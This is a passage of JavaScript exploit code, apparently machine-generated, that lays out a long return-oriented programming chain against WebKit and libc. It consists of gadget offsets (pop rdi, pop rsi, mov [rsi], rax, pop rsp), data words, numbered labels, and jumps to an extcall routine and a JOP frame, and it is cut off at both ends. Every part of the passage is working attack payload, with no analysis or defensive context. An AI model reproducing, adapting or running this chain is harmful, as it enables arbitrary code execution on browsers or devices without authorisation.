webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2154: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2156: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2157: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2159: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+151656, //L2162 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151640, //L2160 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2160: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2162: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+151832, //L2165 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+151848, //L2166 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+151800, //L2163 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+151816, //L2164 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2163: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2164: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2165: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2166: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+151944, //L2168 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+151928, //L2167 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2167: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2168: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2170: db([15, 0]); // 0xf set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+152056, //L2171 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2171: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+105700, //or rax, rcx libc_base+764760, //pop rsi ropchain+152208, //L2174 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+152224, //L2175 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152192, //L2173 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2173: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2174: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2175: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+152312, //L2176 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+152328, //L2178 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2176: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2178: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2179: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2181: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+152488, //L2184 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152472, //L2182 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2182: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2184: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+152664, //L2187 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+152680, //L2188 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152632, //L2185 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+152648, //L2186 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2185: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2186: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2187: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2188: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+152776, //L2190 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+152760, //L2189 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2189: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2190: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2191: db([1, 0]); // 0x1 set_gadget(libc_base+763368,); //pop rcx //L2192: db([1, 0]); // 0x1 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+153000, //L2194 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+153016, //L2195 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+152984, //L2193 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2193: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2194: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2195: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+153104, //L2196 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+153120, //L2198 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2196: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2198: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2199: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+3488438, //mov [rax], ecx libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2200: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2202: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+153296, //L2205 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153280, //L2203 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2203: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2205: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+153440, //L2208 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153408, //L2206 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+153424, //L2207 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2206: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2207: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2208: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+153512, //L2210 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2210: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+153568, //L2211 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2211: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+153648, //L2213 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2213: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2215: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+153768, //L2218 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153752, //L2216 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2216: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2218: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+153944, //L2221 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+153960, //L2222 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+153912, //L2219 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+153928, //L2220 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2219: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2220: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2221: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2222: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+154072, //L2223 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+154104, //L2225 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+154088, //L2224 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2223: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2224: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2225: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+154192, //L2227 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2227: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154248, //L2228 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2228: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+154320, //L2230 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2230: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2232: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L2234: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+154480, //L2237 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154464, //L2235 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2235: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2237: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154624, //L2240 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154592, //L2238 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+154608, //L2239 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2238: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2239: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2240: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+154704, //L2241 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2241: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2243: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+154824, //L2246 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154808, //L2244 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2244: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2246: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+154968, //L2249 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+154936, //L2247 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+154952, //L2248 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2247: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2248: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2249: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+155040, //L2251 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2251: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155096, //L2252 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2252: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155176, //L2254 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2254: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2256: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+155296, //L2259 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+155280, //L2257 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2257: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2259: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+155472, //L2262 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+155488, //L2263 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+155440, //L2260 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+155456, //L2261 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2260: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2261: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2262: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2263: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+155600, //L2264 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+155632, //L2266 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+155616, //L2265 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2264: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2265: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2266: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+155720, //L2268 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2268: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+155776, //L2269 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2269: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+155872, //L2272 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2272: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+155928, //L2273 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2273: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L2275: db([16, 0]); // 0x10 set_gadget(libc_base+763368,); //pop rcx //L2276: db([16, 0]); // 0x10 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+156080, //L2278 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2278: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156136, //L2279 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2279: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+156240, //L2281 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2281: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2283: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+156360, //L2286 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156344, //L2284 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2284: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2286: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156504, //L2289 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156472, //L2287 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+156488, //L2288 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2287: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2288: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2289: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+156584, //L2290 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2290: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2292: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+156704, //L2295 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156688, //L2293 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2293: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2295: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+156848, //L2298 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+156816, //L2296 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+156832, //L2297 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2296: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2297: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2298: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2300: ropchain+156952, //L2299 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+86896, //_create_extcall //L2299: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967264, 4294967295]); // -0x20 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+157024, //L2301 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2301: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2303: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157144, //L2306 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157128, //L2304 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2304: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2306: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+157288, //L2309 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157256, //L2307 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+157272, //L2308 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2307: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2308: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2309: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L2310: jop_frame_addr, libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+157416, //L2311 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2311: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2313: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+157536, //L2316 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157520, //L2314 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2314: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2316: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+157680, //L2319 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+157648, 